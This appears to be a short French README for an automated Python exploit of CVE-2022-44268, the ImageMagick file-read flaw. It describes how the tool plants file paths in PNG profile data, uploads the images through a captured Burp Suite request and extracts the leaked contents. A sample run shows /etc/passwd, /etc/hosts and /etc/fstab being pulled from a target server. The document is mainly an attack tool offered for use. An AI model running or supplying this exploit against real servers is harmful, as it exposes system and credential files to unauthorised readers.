
Script Python automatique utilisant cve-2022-44268 pour ajouter une valeur de profil avec un nom de fichier issu d'une liste de fichiers d'entrée dans un fichier d'entrée, mettre à jour le téléversement de l'image en utilisant un fichier request.req d'entrée de Burpsuite (déjà inclus) du téléversement de fichier en téléversant chaque image modifiée, et télécharger les images renvoyées depuis l'URL retournée, extraire le contenu du fichier et le placer dans un répertoire d'entrée.
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
Exploiting for file: /etc/passwd
Saved shrunk image to: image_output_dir/etc_passwd_shrunk.png
Saved extracted content to: output_dir/etc_passwd
Exploiting for file: /etc/hosts
Saved shrunk image to: image_output_dir/etc_hosts_shrunk.png
Saved extracted content to: output_dir/etc_hosts
Exploiting for file: /etc/fstab
Saved shrunk image to: image_output_dir/etc_fstab_shrunk.png
Saved extracted content to: output_dir/etc_fstab